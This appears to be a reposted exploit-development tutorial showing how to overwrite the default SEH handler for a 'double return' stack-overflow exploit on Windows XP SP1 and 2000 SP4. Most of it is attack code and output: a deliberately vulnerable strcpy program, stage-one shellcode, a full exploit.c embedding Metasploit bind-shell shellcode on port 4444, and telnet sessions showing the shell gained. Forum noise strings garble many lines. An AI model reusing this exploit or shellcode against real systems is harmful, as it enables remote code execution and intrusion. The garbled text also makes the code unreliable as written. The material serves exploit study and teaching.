Exploiting Default Exception Handler to Increase Exploit Sta

韩冰

The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address but in this case we will continue overwriting the stack and overwrite the default exception handler as well.

2 G2 i: L7 s! o' j1 K8 v[Buf] <- Shellcode
4 ?% ~2 z9 }  |; [! O6 E[Return Address] <- jmp register (for Windows XP sp1)
[Various Stack Data] <- Junk
[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward
[SE Handler] <- jmp register (for Win2k sp4)
4 C( _! }! M; p. {2 ]7 j$ ~[Stage1 Shellcode] <- stage1 shellcode for win2k
* G$ g$ n7 a2 B
If the first return address (Windows XP SP1) is wrong an exception will occur and the default exception handler will be called (Windows 2000 SP4). Thus allowing us to create a stable exploit with two return addresses

3 ?5 c1 h; ]/ x9 g! b; ~" |3 ^  mNecessary Tools:
2 C6 y6 a. U4 ^' j7 s/ U- OllyDBG
( d* {6 `% b0 u# _- C/C++ Compiler
- nasm
. I( n" V: K# [- s, r" R- Sac

/ ^: L: Y) B& v$ G$ ~9 Y/ L' }( KVulnerable Code:
//lamebuf.c
#include<stdio.h>
#include<string.h>
* u* s- b7 `: t- N: |' H" @$ p; _#include<windows.h>
7 g2 f3 t. U9 rint main(int argc,char *argv[]){

char buf[512];
char buf1[1024]; // <- simulate a stack
//DebugBreak();
if (argc != 2){ return -1; }
: L% B7 C$ m( U  e
strcpy(buf,argv[1]);
return 0x0;
9 {# q* ^. ~4 C4 Q  g1 C}

Getting Started:
Before writing the exploit, lets see what happens when we overflow this application with 1600 bytes. The application crashed in the following state of registers:

EAX 00000000
! |, Y$ W& l9 p+ NECX 00321404
EDX 00414141
EBX 7FFDF000
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
* R3 W" Z( d. U( }EBP 41414141
$ _6 ~8 J% Q  K( M4 j, d0 aESI 77D4595F
9 ^* o; m( k3 J$ g) G; oEDI 77F59037 ntdll.77F59037
EIP 41414141

* C5 ?2 d+ C7 f( k- g5 I+ JLets take a look at the stack and see what happened to the default exception handler:
0x0012FFB0 41414141 Pointer to next SEH Record
0x0012FFB4 41414141 SE Handler
) w. v- b. \/ {8 v6 B5 j
- q% q+ o0 D3 H) H2 b6 c% fWe successfully overwrote the return address and the default exception handler.
; \7 M9 @! x5 s
& @. e- e# ?8 xPrimary Return Address (Windows XP SP1 EN):
The first return address will be called as in a normal stack overflow. We can see that esp points to user-input, we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first stage shellcode will be:
+ u/ d  z7 _8 f: {7 U"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"

Secondary Return Address (Windows 2000 SP4 EN):
/ G+ D; K1 u/ {- t4 EThe secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first stage shellcode will be:
1 J( D; e$ P# y7 F, b, h# d- v"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"

" T* U7 q7 l4 [8 ?8 ^* h  nProof Of Concept:
// exploit.c
4 M) r+ `5 A; U// Tal zeltzer - [Double Return] //
" Q' b! a& ~" Y8 _
#include<stdio.h>
2 B% k# u: a" m#include<string.h>
# _. j2 T/ B4 ?& q; G( U! ]0 n#include<windows.h>

* f3 W1 e9 O" c6 f#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp
/ J/ |: d; j5 r, r#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx

% I3 Y* P5 T) r/ j// Stage1 For WinXP Sp1 English
, R2 I# }, G9 F* ]unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";
9 S1 ^- E3 a' o. @
// Stage1 For Win2k Sp4 English
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";
- C( J# u) O- `! ?. _: r$ y
4 X$ i9 V4 T: Y2 `// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] _blank>http://metasploit.com
  I1 c+ k0 I" u0 z" Y  b' p, F4 qunsigned char shellcode[] =
* B  w; R$ ^, Q( |9 E4 N"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
0 X' Y0 Z* W5 l"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
' K4 @0 Z% L# t1 u  J& \"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
6 i3 z4 N! }, @"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
% ~6 J" Y5 {8 k2 m% N"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
" b5 Z$ }- E& Q3 `! C"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
8 Y# k7 A0 F6 }* C, L"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
5 M  Q$ ?- ?! P1 m, a3 C"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
& ^  g& ]7 q* O& F"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
* X9 t/ C* ~- h# t, B0 S- P# y9 I/ M"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
* ~2 d+ T% r/ _- L, I"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
: r6 h8 m8 A% {$ ~3 E- \"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
! r+ J" z! x* l1 f"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
/ Z/ U' k( Z# {  d# l4 h"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";
3 [" V& {8 o$ z

2 f* E0 J; F- [$ ^int main(int argc,char *argv[]){

char *bufExe[3];
char buf[2048];
bufExe[0] = "lamebuf.exe";
bufExe[2] = NULL;

memset(buf,0x0,sizeof(buf));
  o/ k/ E  w& K, B' T1 U3 K3 ymemset(buf,0x90,1652);
- {+ ~( y2 S  L5 ~memcpy(&buf[24],shellcode,sizeof(shellcode)-1);
  r' O# {6 A, M. A
memcpy(&buf[1544],&stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode
memcpy(&buf[1592],&stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage2 Shellcode
2 b$ L* _2 G1 I, |7 N1 d
; i; J5 }: f: k*(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en
8 _( D8 }4 Z: W- g/ [7 {*(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code
*(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en
* u# ~+ Z$ V# Q/ k! M/ N

: f, C* G6 V' j3 I3 X5 d% }$ K! bbufExe[1] = buf;
0 W0 J6 ~0 s7 p  u, c1 f( p3 j//Execute the vulnerable application
* J1 F2 ]( _+ M  k: ]/ [- H; G) nexecve(bufExe[0],bufExe,NULL);

return 0x0;
}

Exploit under Windows XP SP1:
7 T* Y; R/ K1 ]C:\>exploit
C:\>
8 H  Y" g# R  s8 j1 B# |7 b: ]+ xC:\>telnet 127.0.0.1 4444
# q" f2 V5 n: e. y( U0 _- l/ Y
Microsoft Windows XP [Version 5.1.2600]
& }, `- D1 z/ e(C) Copyright 1985-2001 Microsoft Corp.
5 p) U6 R1 e2 ^  O3 v
8 B- j& |9 `! yC:\>
" _4 j9 L4 g: e% F, W  k: l
& e6 n5 ^' a0 o7 ^- L% z( oExploit under Windows 2000 SP4:
C:\>exploit
, J: s. Y" O! T& L' NC:\>
C:\>telnet 127.0.0.1 4444
% `/ ]8 p/ c1 W0 C2 b
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.